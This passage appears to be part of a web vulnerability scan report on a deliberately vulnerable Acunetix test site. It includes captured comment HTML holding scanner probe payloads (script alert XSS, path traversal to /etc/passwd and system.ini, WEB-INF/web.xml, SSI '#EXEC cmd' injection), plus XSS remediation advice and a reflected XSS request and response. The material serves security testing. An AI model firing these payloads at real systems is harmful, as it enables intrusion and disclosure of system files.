class="CommentText"></div><script>alert(1);</script><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter tbCommentAttack </div><script>alert(1);</script><div>Solution フェーズ: アーキテクチャと設計
同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
-
Cross Site Scripting (Reflected) (3)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
Alert tags Alert description Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request Request line and header section (377 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232 Content-Length: 0Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:07:27 GMT Content-Length: 30484Response body (30484 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldC